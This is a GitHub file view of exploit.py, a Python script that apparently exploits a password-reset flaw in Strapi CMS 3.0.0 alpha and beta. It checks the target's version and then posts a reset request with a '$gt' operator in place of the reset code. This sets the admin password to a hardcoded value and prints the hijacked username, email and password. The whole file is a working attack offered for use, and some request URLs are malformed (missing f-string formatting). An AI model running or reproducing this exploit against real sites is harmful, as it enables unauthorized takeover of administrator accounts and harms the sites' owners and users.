-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
55 lines (48 loc) · 1.85 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#Author Kynda
#01/01/2020
import requests, sys, json
NEW_PASS = "Shadawks123*"
if len(sys.argv) != 3:
sys.exit("[ ! ] Usage: python3 exploit.py <url> <email>")
def isVuln(version):
if version.startswith('3.0.0-beta') or version.startswith('3.0.0-alpha'):
return True
return False
def get_version(url):
print("[ + ] Checking Strapi Version")
r = requests.get(f"{url}/admin/init").json()
try:
if isVuln(r['data']['strapiVersion']):
print("[ + ] Target version is vulnerable.")
else:
print("[ - ] Target version is not vulnerable.")
except KeyError:
try:
r = requests.get(f"{url}/admin/strapiVersion").json()
if isVuln(r['strapiVersion']):
print("[ + ] Target version is vulnerable.")
else:
print("[ - ] Target version is not vulnerable.")
except KeyError:
print("[ - ] Can't find Strapi Version.")
except json.decoder.JSONDecodeError:
print("[ - ] Can't find Strapi Version.")
def pass_reset(url, email):
params = {
"code": {"$gt":0},
"password": NEW_PASS,
"passwordConfirmation": NEW_PASS
}
payload = {"email": email, "url":"{url}/admin/plugins/users-permissions/auth/reset-password"}
requests.post("{url}/", json=payload)
try:
r = requests.post(f"{url}/admin/auth/reset-password", json=params).json()
if "jwt" not in r:
sys.exit("[ - ] Website is not vulnerable.")
print(f"[ + ] Password reset successfull.\nUsername: {r['user']['username']}\nEmail: {r['user']['email']}\nPassword: {NEW_PASS}")
except json.decoder.JSONDecodeError:
sys.exit("[ - ] Website is not vulnerable.")
url = sys.argv[1][:-1] if sys.argv[1].endswith('/') else sys.argv[1]
email = sys.argv[2]
get_version(url)
pass_reset(url, email)